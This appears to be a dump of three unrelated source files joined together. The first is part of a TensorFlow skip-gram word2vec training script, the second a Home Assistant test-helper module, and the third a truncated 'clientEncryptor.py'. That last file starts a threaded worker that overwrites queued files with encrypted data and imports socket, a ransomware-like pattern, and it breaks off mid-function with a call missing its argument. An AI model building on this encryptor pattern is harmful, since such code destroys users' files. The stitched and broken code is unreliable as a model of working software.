line = f1.read(1)
index_list = line[0][1].split(",")
dataset.append(index_list)
if i % 500000 == 0: print("reading: %d"%i)
return dataset
# Read the data and merge it into one flat list of words
def read_data(self, dataset):
print("merging the sentence lists into one big word list")
words = []
for data in dataset:
words.extend(data)
return words
# Build the dataset
def build_dataset(self, words, min_count):
# Build the vocabulary and filter low-frequency words (a typical choice is min_count >= 5);
# all other words are treated as Unknown ('UNK') with id 0 -- the same min_count idea gensim's word2vec uses.
# Then number the words in the original words list with their dictionary ids, i.e. convert words to integers,
# store them in the data list, and count the UNK occurrences at the same time.
count = [['UNK', -1]] # frequency table
count.extend([item for item in collections.Counter(words).most_common() if item[1] >= min_count])
dictionary = dict() # index table {word: index}
for word, _ in count:
dictionary[word] = len(dictionary)
data = list() # word ids per sentence
unk_count = 0
for word in words:
if word in dictionary:
index = dictionary[word]
else:
index = 0
unk_count += 1
# data.append(index)
count[0][1] = unk_count
# Invert the dictionary so a word can be looked up by its id; store it in reverse_dictionary
reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
# Build the per-sentence word-id lists
for sentence in self.dataset:
sentence_index_list = []
for word in list(set(sentence)):
if word in dictionary.keys():
index = dictionary[word]
else:
index = 0
sentence_index_list.append(index)
data.append(sentence_index_list)
return data, count, dictionary, reverse_dictionary
# This method generates the pair list, i.e. [(center, label), ...]
def centerword_label_pair_generate(self,window_size,data,scheme = "all"):
# Open question: should each sentence only produce 10 (input, label) pairs per center word,
# split into sentence_word_num//10 groups with the group order shuffled?
# pair_list = [] # (input, label); keeping every label gives about sentence_word_num^2 * sentence_num pairs, e.g. (10^2)^2*10^4
# format: [[(pair1),(pair2),...(pairN)] for sentence1, [...] for sentence2, ..., [...] for sentenceN]
print("2.1 center word label pair generate")
lasttime = time.time()
tmp_list = []
# with tf.gfile.GFile(self.output_path + self.pair_name, 'w') as fw:
with common_io.table.TableWriter(self.output_table) as fw:
print("2.2 all data count is %d"%len(data))
for num,sentence in enumerate(data):
random.shuffle(sentence) # shuffle the order
sentence_pair_list = []
sentence_len = len(sentence)
for i in range(sentence_len):
center_word = sentence[i]
count = 0
for j in range(sentence_len):
random_sampling = random.randint(0, sentence_len-1)
if random_sampling != i:
label_word = sentence[random_sampling]
sentence_pair_list.append((center_word,label_word))
if count>20:break;
count+=1
if scheme == "all":
# Option 1: full, consecutive-window scheme for the center word
# pair_list.extend(sentence_pair_list)
pass
elif scheme == "window":
# Option 2: shuffled-order scheme: within a sentence, work in units of twice the window size and shuffle the groups
label_num = 2*window_size # number of labels in one front/back window
if sentence_len<label_num+1:continue; # skip the sentence if the window does not fit
sentence_pair_num = len(sentence_pair_list) # number of pairs
sentence_group_num = sentence_pair_num//label_num # number of groups
last_num = sentence_pair_num%label_num # remainder
# split into sentence_group_num+1 groups in total
sentence_pair_list_by_group = [sentence_pair_list[num*label_num:(num+1)*label_num] for num in range(sentence_group_num)]
sentence_pair_list_by_group.append(sentence_pair_list[-1-last_num:-1])
random.shuffle(sentence_pair_list_by_group)
sentence_pair_list_shuffle = []
for ss in sentence_pair_list_by_group:
sentence_pair_list_shuffle.extend(ss)
sentence_pair_list = sentence_pair_list_shuffle
#pair_list.extend(sentence_pair_list_shuffle)
else:
print("input error!")
break
if len(sentence_pair_list):
for pair in sentence_pair_list:
# tmp_list.append((str(pair[0])+","+str(pair[1])))
tmp_list.append( str(pair[0])+","+str(pair[1]) )
if num % 30000 == 0:
start = lasttime
middletime = time.time()
if num %100 == 0:
if num>1:
# fw.write("\n".join(tmp_list)+"\n")
ready_to_write_list = ["|".join(tmp_list)]
fw.write( ready_to_write_list,range(1) )
tmp_list = []
if num%30000 == 0:
lasttime = time.time()
print("line num is {}, every 30000 imei use time is {}, write 30000 time is {}, process time is {}".format(
num,lasttime-start,lasttime-middletime, middletime-start))
# return pair_list
def readfile2list(self):
print("3. reading data and make dictionary")
dataset = []
with common_io.table.TableReader(self.pair_table) as f1:
cnt = f1.get_row_count()
print("all need to read %d lines"%cnt)
for i in range(cnt):
line = f1.read(1)
center_word = line[0][0]
label_word = line[0][1]
dataset.append((center_word, label_word))
if i % 500000 == 0: print("reading: %d"%i)
return dataset
def linepara(self, line):
data_list = []
line_pair_list = line[0][0].split("|")
for pair in line_pair_list:
pair_list = pair.split(",")
pair_tuple = (pair_list[0], pair_list[1])
data_list.append(pair_tuple)
return data_list
def lineproduce(self):
# Data-producing thread:
# 1. parse the table; 2. satisfy the batch demand; 3. serve the consumer thread; 4. as the producer, stop when self.queue_readingstate passes the stop state
queue_preline = self.queue_preline
queue_readingstate = self.queue_readingstate
reader = common_io.table.TableReader(
self.pair_table
)
total_records_num = reader.get_row_count()
print("start to read odps table and need read %d lines"%total_records_num)
count = 0
for _ in range(total_records_num):
data=reader.read(1)
data_list = self.linepara(data)
queue_preline.put(data_list) # producer loads the data
print("=========produce %d line======="%count)
count += 1
StateFlag = queue_readingstate.get() # fetch the state
if StateFlag: # the state flag controls when to stop
# save the embeddings
print("embedding size is %d" % (len(self.final_embeddings)))
print("writing embedding")
final_embeddings = self.final_embeddings
print(final_embeddings[0])
print("save model path is %s" % (self.modelpath + "model"))
fw = tf.gfile.GFile(self.modelpath + "model", 'w')
for index, item in enumerate(final_embeddings):
if index % 50000 == 0:
print("save dictionary %d lines" % index)
# fw.write(reverse_dictionary[index] + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.write(str(index) + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.close()
print("可能还有语料,但是Step已经到了上限")
break
def __readdata(self):
# When to fetch data from the queue: once the batches have consumed the current lines
self.data_index = 0
queue_preline = self.queue_preline
self.pair_list = queue_preline.get()
self.length_pair_list = len(self.pair_list)
print("consumer get queue data, line number is %d"%(len(self.pair_list)))
# Generate training samples (assert declares a condition that must hold; if it fails, the assumption was false)
def generate_batch(self, batch_size, window_size):
# This function draws training pairs in the order they appear in the pair list.
# For each word in data it pairs the current word with its previous and next word,
# i.e. [data[1],data[0]] and [data[1],data[2]]; the current word data[1] goes into batch, the neighbours go into labels.
# batch_size: how many samples to train per batch
# num_skips: how many samples to generate per word (2 in this experiment); batch_size must be a multiple of num_skips so that samples from one target word stay in the same batch.
# window_size: the farthest distance a word can relate to (1 in this experiment, i.e. the target word is only paired with its two neighbours); 2*window_size >= num_skips
'''
eg:
input_batch, labels = generate_batch(batch_size = 8, num_skips = 2, window_size = 1)
#Sample data [0, 5241, 3082, 12, 6, 195, 2, 3137, 46, 59] ['UNK', 'anarchism', 'originated', 'as', 'a', 'term', 'of', 'abuse', 'first', 'used']
# assume num_skips = 2, window_size = 1, batch_size = 8
#input_batch:[5242, 3084, 12, 6]
#labels[0, 3082, 5241, 12, 3082, 6, 12, 195]
print(input_batch) [5242 5242 3084 3084 12 12 6 6], 8 elements in total
print(labels) [[ 0] [3082] [ 12] [5242] [ 6] [3082] [ 12] [ 195]], 8 elements in total
'''
input_batch = np.ndarray(shape = (batch_size), dtype = np.int32) # array of batch_size center words
labels = np.ndarray(shape = (batch_size, 1), dtype = np.int32) # (batch_size, 1) array holding the word before or after each center word, forming a pair
label_num = 2*window_size # number of labels in one front/back window
buffer = collections.deque(maxlen = batch_size) # double-ended queue used as a buffer to build input_batch and labels
# self.pair_list should be made iterable
# print("generate batch data")
for _ in range(batch_size):
buffer.append(self.pair_list[self.data_index]) # load one pair at a time
self.data_index = (self.data_index + 1) % self.length_pair_list # self.data_index is global, so it keeps advancing across calls
# even when it reaches the tail it wraps around to the head
# print(buffer)
for i in range(batch_size): # i.e. how many windows the batch processes at once
input_batch[i] = int(buffer[i][0])
labels[i, 0] = int(buffer[i][1])
buffer.append(self.pair_list[self.data_index])
self.data_index = (self.data_index + 1) % self.length_pair_list
return input_batch, labels
def train_wordvec(self, vocabulary_size, batch_size, embedding_size, window_size, num_sampled, num_steps):
# Define the network structure of the skip-gram word2vec model
graph = tf.Graph()
with graph.as_default():
# Input data, one batch_size worth
train_inputs = tf.placeholder(tf.int32, shape = [batch_size])
# Target data, shape [batch_size, 1]
train_labels = tf.placeholder(tf.int32, shape = [batch_size, 1])
# Train on CPU (commented out; a GPU is available)
# with tf.device('/cpu:0'):
# Create a vocabulary_size x embedding_size random matrix: one embedding_size-dimensional vector per word in the vocabulary.
# The embedding matrix is initialised uniformly at random, tf.random_uniform(shape, minval=low, maxval=high, dtype=tf.float32),
# with values between -1 and 1; its size is vocabulary size times embedding dimension.
embeddings = tf.Variable(tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
# tf.nn.embedding_lookup selects the elements of a tensor at the given indices; it looks up the word embeddings and vectorises the input sequence.
# tf.nn.embedding_lookup(params, ids, partition_strategy='mod', name=None, validate_indices=True, max_norm=None)
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
# Fully connected layer Wx+b: W is a vocabulary_size x embedding_size weight matrix, initialised from a truncated normal distribution
nce_weights = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size], stddev = 1.0 / math.sqrt(embedding_size)))
# Fully connected layer Wx+b: the bias vector has size vocabulary_size
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Define the loss: tf.reduce_mean averages the NCE loss (the loss obtained from negative sampling)
loss = tf.reduce_mean(tf.nn.nce_loss(weights = nce_weights,# weights
biases = nce_biases,# biases
labels = train_labels,# input labels
inputs = embed, # input vectors
num_sampled = num_sampled,# number of negative samples
num_classes = vocabulary_size))# number of classes
# Define the optimizer: gradient descent
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
# Compute the norm of each word vector and normalise to unit length, keeping the embedding dimension
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims = True))
normalized_embeddings = embeddings / norm
# Initialise the model variables
init = tf.global_variables_initializer()
# Train on the constructed graph
queue_readingstate = self.queue_readingstate
# queue_readingstate.put(False)
with tf.Session(graph = graph) as session:
# Run the initialiser
init.run()
# Running average of the loss
average_loss = 0
# Iterate step by step
data_offer_steps = 0 # how many steps of data have been provided so far
print("start training")
for num, step in enumerate(range(num_steps)):
# print("train num is %d, train step is %d"%(num,step))
if len(self.pair_list) == 0:
queue_readingstate.put(False)
self.__readdata()
max_steps_pre_line = len(self.pair_list)//batch_size
print("get data %d"%max_steps_pre_line)
assert max_steps_pre_line > 0
data_offer_steps += max_steps_pre_line
if num >= data_offer_steps:
queue_readingstate.put(False)
self.__readdata()
max_steps_pre_line = len(self.pair_list) // batch_size
assert max_steps_pre_line > 0
data_offer_steps += max_steps_pre_line
batch_inputs, batch_labels = self.generate_batch(batch_size, window_size)
# feed_dict is a dict supplying a value for every placeholder that is used
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
# Compute the loss for this iteration
_, loss_val = session.run([optimizer, loss], feed_dict = feed_dict)
# Accumulate the total loss
average_loss += loss_val
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
print("Average loss at step ", step, ":", average_loss)
average_loss = 0
if num%1000==0:print("train num is %d"%num)
print("training is over")
self.final_embeddings = normalized_embeddings.eval()
# Thread stop signal: pass the stop command through the queue once all tensor work has finished
queue_readingstate.put(True)
# return final_embeddings
# Save the embedding file
def save_embedding(self, final_embeddings=None, reverse_dictionary=None):
# final_embeddings = self.final_embeddings
fw = tf.gfile.GFile(self.modelpath + "model", 'w')
for index, item in enumerate(final_embeddings):
# fw.write(reverse_dictionary[index] + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.write(str(index) + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.close()
# Main training entry point
def train(self):
# data, count, dictionary, reverse_dictionary = self.build_dataset(self.words, self.min_count)
# vocabulary_size = len(count)
vocabulary_size = self.vocabulary_size
self.train_wordvec(vocabulary_size, self.batch_size, self.embedding_size, self.window_size, self.num_sampled, self.num_steps)
final_embeddings = self.final_embeddings
self.save_embedding(final_embeddings)
def run(self):
vocabulary_size = self.vocabulary_size
print("start muli threding")
print("producter")
Thread_reading = threading.Thread(target=self.lineproduce, args=())
print("consumer")
Thread_train = threading.Thread(target=self.train_wordvec, args=(vocabulary_size, self.batch_size, self.embedding_size, self.window_size, self.num_sampled, self.num_steps))
Thread_train.setDaemon(True)
Thread_reading.start()
Thread_train.start()
# print("writing embedding")
# final_embeddings = self.final_embeddings
# self.save_embedding(final_embeddings)
def main():
vector = SkipGram()
# vector.run()
if __name__ == '__main__':
main()
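# Usage sketch (illustrative; main() above intentionally only constructs the object):
#
#     vector = SkipGram()   # building the object also writes the (center, label) pair table
#     vector.run()          # starts the producer thread (lineproduce) and the training thread (train_wordvec)
#
# Note that run() returns right after starting the threads; the producer thread saves the
# final embeddings once train_wordvec signals completion through queue_readingstate.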
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, data_entry_flow, config_entries
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@asyncio.coroutine
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockUser(auth.User):
"""Mock a user in Home Assistant."""
def __init__(self, id='mock-id', is_owner=True, is_active=True,
name='Mock User'):
"""Initialize mock user."""
super().__init__(id, is_owner, is_active, name)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store.users[self.id] = self
return self
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store.clients is None:
store.clients = {}
if store.users is None:
store.users = {}
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=data_entry_flow.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count. It is optional and can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
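# Usage sketch (illustrative module names):
#
#     @MockDependency('somelib', 'somelib.client')
#     def test_something(mock_somelib):
#         mock_somelib.client.connect.return_value = True
#         ...
#
# The decorator patches sys.modules for the duration of the call and passes the root
# MagicMock to the test as an extra positional argument.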
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
store._data = data.get(store.key)
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
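# Usage sketch (illustrative storage key and payload):
#
#     async def test_load_from_mocked_storage(hass):
#         with mock_storage({'my_key': {'version': 1, 'data': {'answer': 42}}}) as data:
#             store = storage.Store(hass, 1, 'my_key')
#             assert await store.async_load() == {'answer': 42}
#             # anything the code under test writes appears JSON-round-tripped in `data`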
|
clientEncryptor.py
|
import random
import os
import threading
import queue
import socket
# Encryption function that the threads will call
def encrypt(key):
while True:
file = q.get()
print(f'Encrypting {file}')
try:
key_index = 0
max_key_index = len(key) - 1
encrypted_data = ''
with open(file, 'rb') as f:
data = f.read()
with open(file, 'w') as f:
f.write()
